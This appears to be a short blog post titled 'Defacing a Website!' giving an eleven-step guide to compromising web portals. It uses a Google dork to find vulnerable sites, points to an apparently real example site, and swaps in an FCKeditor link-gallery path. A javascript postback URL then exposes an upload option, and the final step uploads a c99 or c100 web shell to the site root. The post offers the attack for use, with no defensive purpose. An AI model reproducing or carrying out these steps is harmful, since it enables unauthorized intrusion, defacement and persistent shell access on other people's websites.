-->

Defacing a Website!


Step 1 : http://www.google.com/

Step 2: Now enter this dork
:inurl:/tabid/36/language/en-US/Default.aspx

this is a dork to find the Portal Vulnerable sites, use it wisely.

Step 3:  you will find many sites, Select the site which you are comfortable with.

Step 4:  For example take this site.
Example:
http://fril.co.il/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Step 5:  Now replace
/Home/tabid/36/Language/en-US/Default.aspx

with this
/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx

Step 6: You will get a Link Gallary page.So far so good!

Step 7: Dont do anything for now,wait for the next step...

Step 8: Now replace the URL in the address bar with a Simple Script
javascript:__doPostBack('ctlURL$cmdUpload','')

Step 9: You will Find the Upload Option

Step 10: Select Root

Step 11: Upload your package Your Shell c99,c100 etc etc

Courtesy : Arjun Raghavendran

No comments:

Post a Comment

Leave your valuable feedback...